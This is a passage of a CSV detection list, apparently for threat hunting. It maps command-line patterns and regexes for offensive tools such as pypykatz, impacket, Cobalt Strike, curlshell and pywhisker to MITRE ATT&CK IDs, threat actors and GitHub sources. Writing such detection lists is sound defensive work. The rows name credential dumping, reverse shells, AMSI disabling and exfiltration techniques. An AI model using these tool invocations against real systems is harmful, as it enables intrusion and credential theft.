*.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.js\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4778" "*.py -k * -f *.pps -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.pps\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4779" "*.py -k * -f *.ppsx -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.ppsx\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4780" "*.py -k * -f *.ppt -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.ppt\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4781" "*.py -k * -f *.ps1 -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.ps1\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4782" "*.py -k * -f *.xll -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xll\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4783" "*.py -k * -f *.xls -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xls\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4784" "*.py -k * -f *.xlsb -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xlsb\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4785" "*.py -k * -f *.xlsm -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xlsm\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4786" "*.py -k * -f *.xlsx -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.xlsx\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4787" "*.py rekall *.dmp* -t 0",".{0,1000}\.py\s\srekall\s.{0,1000}\.dmp.{0,1000}\s\-t\s0","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","4788" "*.py -t *.tpe -c *.exe* -remote-lib *-remote-target *",".{0,1000}\.py\s\s\-t\s.{0,1000}\.tpe\s\-c\s.{0,1000}\.exe.{0,1000}\s\-remote\-lib\s.{0,1000}\-remote\-target\s.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","4789" "*.py * amsi -disable*",".{0,1000}\.py\s.{0,1000}\samsi\s\-disable.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","4790" "*.py * amsi -enable*",".{0,1000}\.py\s.{0,1000}\samsi\s\-enable.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in 
Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","4791" "*.py * --brop *",".{0,1000}\.py\s.{0,1000}\s\-\-brop\s.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","0","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","4792" "*.py * --burp *",".{0,1000}\.py\s.{0,1000}\s\-\-burp\s.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","4793" "*.py * coerce -computer *",".{0,1000}\.py\s.{0,1000}\scoerce\s\-computer\s.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","4794" "*.py * --coerce-to *",".{0,1000}\.py\s.{0,1000}\s\-\-coerce\-to\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege 
Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","4795" "*.py * -debug -dnstcp*",".{0,1000}\.py\s.{0,1000}\s\-debug\s\-dnstcp.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","10","","N/A","","","","4796" "*.py * --fake-server*",".{0,1000}\.py\s.{0,1000}\s\s\-\-fake\-server.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","4797" "*.py * --just-coerce *",".{0,1000}\.py\s.{0,1000}\s\-\-just\-coerce\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","4798" "*.py * -k -no-pass*",".{0,1000}\.py\s.{0,1000}\s\-k\s\-no\-pass.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","4799" "*.py * --sql-shell*",".{0,1000}\.py\s.{0,1000}\s\-\-sql\-shell.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","4800" "*.py * --teamserver *",".{0,1000}\.py\s.{0,1000}\s\-\-teamserver\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","4801" "*.py *.cs cs ms*",".{0,1000}\.py\s.{0,1000}\.cs\scs\sms.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","4802" "*.py *.exe *NormalDLL.dll*",".{0,1000}\.py\s.{0,1000}\.exe\s.{0,1000}NormalDLL\.dll.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/Iansus/DllProxy/","1","0","N/A","N/A","N/A","1","17","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z","4803" "*.py *.vba *.vba --norandomvariables --math*",".{0,1000}\.py\s.{0,1000}\.vba\s.{0,1000}\.vba\s\s\-\-norandomvariables\s\-\-math.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","4804" "*.py *.vba *.vba --wordlistpath * --encodestring*","\s.{0,1000}\.py\s.{0,1000}\.vba\s.{0,1000}\.vba\s\s\-\-wordlistpath\s.{0,1000}\s\-\-encodestring.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","4805" "*.py *.vba *.vba --randomcuts 5 10 --norandomint*",".{0,1000}\.py\s.{0,1000}\.vba\s.{0,1000}\.vba\s\-\-randomcuts\s5\s10\s\-\-norandomint.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","4806" "*.py *.vba *.vba --usebusinesswords 
--encodestring_calls*",".{0,1000}\.py\s.{0,1000}\.vba\s.{0,1000}\.vba\s\-\-usebusinesswords\s\-\-encodestring_calls.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","4807" "*.py *.vba *.vba --usebusinesswords --math*",".{0,1000}\.py\s.{0,1000}\.vba\s.{0,1000}\.vba\s\-\-usebusinesswords\s\-\-math.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","4808" "*.py *0.0.0.0*--serve-forever*",".{0,1000}\.py\s.{0,1000}0\.0\.0\.0.{0,1000}\-\-serve\-forever.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","4809" "*.py *--dependabot-workaround*",".{0,1000}\.py\s.{0,1000}\-\-dependabot\-workaround.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","4810" "*.py 127.0.0.1 50050 logtracker password*",".{0,1000}\.py\s127\.0\.0\.1\s50050\slogtracker\spassword.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","4812" "*.py -action add_computer -crt * -key * -domain * -dc-ip * -computer-name * -computer-pass *",".{0,1000}\.py\s\-action\sadd_computer\s\-crt\s.{0,1000}\s\-key\s.{0,1000}\s\-domain\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-computer\-name\s.{0,1000}\s\-computer\-pass\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to 
authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","4813" "*.py -aesKey ""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab""*",".{0,1000}\.py\s\-aesKey\s\""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab\"".{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","4814" "*.py -c -m c2 -p utils*",".{0,1000}\.py\s\-c\s\-m\sc2\s\-p\sutils.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","N/A","10","10","538","47","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z","4815" "*.py --cached --ntuser NTUSER.DAT*",".{0,1000}\.py\s\-\-cached\s\-\-ntuser\sNTUSER\.DAT.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. 
Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","4816" "*.py callobf,upx,hyperion *.exe*",".{0,1000}\.py\scallobf,upx,hyperion\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","4817" "*.py --certificate *.pem --private-key *.pem --listen-port *",".{0,1000}\.py\s\-\-certificate\s.{0,1000}\.pem\s\-\-private\-key\s.{0,1000}\.pem\s\-\-listen\-port\s.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","4818" "*.py --certificate fullchain.pem --private-key privkey.pem --listen-port *",".{0,1000}\.py\s\-\-certificate\sfullchain\.pem\s\-\-private\-key\sprivkey\.pem\s\-\-listen\-port\s.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#linux","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","4819" "*.py --client ftp --username * --password * --ip * --datatype ssn*",".{0,1000}\.py\s\-\-client\sftp\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}\s\-\-ip\s.{0,1000}\s\-\-datatype\sssn.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - 
TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","4820" "*.py --client https --data-size * --ip * --datatype cc*",".{0,1000}\.py\s\-\-client\shttps\s\-\-data\-size\s.{0,1000}\s\-\-ip\s.{0,1000}\s\-\-datatype\scc.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","4821" "*.py -d ""test.local"" -u ""john"" -p ""password123"" --target ""user2"" --action ""list"" --dc-ip ""10.10.10.1""*",".{0,1000}\.py\s\-d\s\""test\.local\""\s\-u\s\""john\""\s\-p\s\""password123\""\s\-\-target\s\""user2\""\s\-\-action\s\""list\""\s\-\-dc\-ip\s\""10\.10\.10\.1\"".{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4822" "*.py -d * -u * -p * --target * --action * --export PEM*",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\s.{0,1000}\s\-\-export\sPEM.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4823" "*.py -d 
* -u * -p * --target * --action ""add"" --filename * ",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""add\""\s\-\-filename\s.{0,1000}\s","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4824" "*.py -d * -u * -p * --target * --action ""clear""* ",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""clear\"".{0,1000}\s","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4825" "*.py -d * -u * -p * --target * --action ""info"" --device-id *",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""info\""\s\-\-device\-id\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4826" "*.py -d * -u * -p * --target * --action ""list"" *",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""list\""\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential 
Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4827" "*.py -d * -u * -p * --target * --action ""remove"" --device-id *",".{0,1000}\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-target\s.{0,1000}\s\-\-action\s\""remove\""\s\-\-device\-id\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","N/A","10","8","712","89","2025-04-21T16:53:22Z","2021-07-21T19:20:00Z","4828" "*.py discover -H domain_list.txt*",".{0,1000}\.py\sdiscover\s\-H\sdomain_list\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - 